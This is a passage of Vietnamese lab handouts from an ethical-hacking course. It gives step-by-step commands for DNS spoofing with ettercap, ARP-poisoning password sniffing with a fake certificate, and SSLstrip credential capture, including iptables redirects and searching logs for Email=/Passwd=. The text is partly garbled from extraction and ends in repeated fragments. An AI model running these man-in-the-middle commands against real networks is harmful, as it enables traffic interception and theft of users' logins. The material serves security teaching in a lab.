ATHENA DNS SPOOFING LAB - Bước 3: Restart lại service apache2 - Bước 4: Kiểm tra nội dung trang web http:/localhost/index.html Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Bước 5: Tấn công công cụ ettercap dns_spoof plugin Ta thêm vào số dòng sau vào file /usr/share/ettercap/etter.dns để thay đổi thông số dns client *.athena.edu.vn A 192.168.1.3 www.athena.edu.vn A 192.168.1.3 tailieu.athena.edu.vn A 192.168.1.3 *.athena.edu.vn PTR 192.168.1.3 www.athena.edu.vn PTR 192.168.1.3 tailieu.athena.edu.vn PTR 192.168.1.3 Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tại máy client thử login vào trang www.athena.edu.vn trước ta thực công ta thấy trang web trả bình thường Sau ta nên sử dụng ipconfig /flushdns để xóa thơng tin dns - Bước 6: Tại máy attacker ta thực công câu lệnh “Ettercap -T -q – M arp:remote –P dns_spoof –i eth0 /192.168.1.11/ // “ Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Bước 7: Tại máy client ta browser vào lại trang web www.athena.edu.vn vào trang web giả attack dựng lên Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Bài: Ettercap Sniffer Password Mục đích lab - Sử dụng cơng cụ Ettercap thực ARP Poisoning, fake certificate để sniffer password Sử dụng plugin để theo dõi victim duyệt web trang - Sơ đồ lab sau: Các bước thực - Bước 1: cấu hình ettercap file “ etter.conf “ Ta xác định vị trí file etter.conf sau Sử dụng vi gedit để mở file etter.conf Thay đổi giá trị dòng 17 18 Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Thay đổi giá trị dòng 145 Thay đổi giá trị dòng 170 171 - Bước 2: Thực ARP Poisoning attack Máy Victim Window XP có IP 192.168.1.6 Ta nhập vào câu lệnh “ettercap -T -q –M arp:remote –P remote_browser –i eth0 /192.168.1.6/ // ” - Bước 3: máy Victim thực duyệt web Ví dụ victim sử dụng Gmail xuất cảnh báo lỗi certificate Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tại máy attacker xuất dòng log cho thấy victim kết nối vào mail.google.com Khi Victim cố gắng tiếp tục đăng nhập bị username password Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Bài: SSL Strip Mục tiêu lab - SSL Strip công cụ tương tác trình chuyển từ http sang https ứng dụng web SSL Strip công cụ hữu hiệu để capture username password login ứng dụng web - Công cụ SSL Strip install mặc định hệ điều hành Backtrack Đầu tiên ta xác định vị trí file thực thi cách thức sử dụng giao diện dòng lệnh Backtrack - Sơ đồ Lab: Victim login vào web application bị sniffer password Các bước thực #locate sslstrip =>câu lệnh xác định file liên quan đến chương trình ssl strip Ta xác định đường dẫn thực thi /pentest/web/sslstrip #cd /pentest/web/sslstrip/ Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân #ls -l -rw-r r root root 4066 2011-05-06 12:22 sslstrip.py #python /sslstrip.py -h =>câu lệnh để ta xem cách thức sử dụng #python /sslstrip.py -a => khởi động chương trình sslstrip ghi log tất kết nối thông qua biến -a => mặc định chương trình sslstrip hoạt động port 10000 #netstat -ltn => xác định port TCP listen máy Ta kiếm vị trí có port 10000 - Các cấu hình chuẩn bị máy Backtrack ( attacker ) #echo > /proc/sys/net/ipv4/ip_forward => kích hoạt khả định tuyến PC #iptables -t nat -A PREROUTING -p TCP destination-port 80 -j REDIRECT toport 10000 =>cấu hình firewall nhận traffic port 80 redirect traffic vào port 10000 Port 10000 tương ứng với chương trình ssl strip - Start sslstrip listen port 10000 ghi log tất kết nối #cd /pentest/web/ssltrip #python /sslstrip.py –a Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Mở cửa sổ terminal khác thực arp poisoning attacker để redirect tất traffic máy attacker #ettercap -T -q -M arp:remote -i eth0 /192.168.1.X/ // - Tại máy victim thực đăng nhập vào ứng dụng web Sau attacker tìm kiếm thơng tin file sslstrip.log Có thể sử dụng từ khóa Email= , Passwd= … để tìm kiếm thơng tin nhạy cảm #cd /pentest/web/sslstrip #cat sslstrip.log > /root/Desktop/password.txt Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân ... *.athena.edu.vn A 192. 168 .1.3 www.athena.edu.vn A 192. 168 .1.3 tailieu.athena.edu.vn A 192. 168 .1.3 *.athena.edu.vn PTR 192. 168 .1.3 www.athena.edu.vn PTR 192. 168 .1.3 tailieu.athena.edu.vn PTR 192. 168 .1.3 Tài... Poisoning attack Máy Victim Window XP có IP 192. 168 .1 .6 Ta nhập vào câu lệnh “ettercap -T -q –M arp:remote –P remote_browser –i eth0 /192. 168 .1 .6/ // ” - Bước 3: máy Victim thực duyệt web Ví dụ... ATHENA.GV: Lê Đình Nhân - Bước 2: Từ menu chọn Configure /Sniffer chọn card mạng sử dụng nhấn OK - Bước 3: Nhấn nút Start Sniffer Chuyển sang tab Sniffer/ Host click chuột phải chọn Scan MAC Address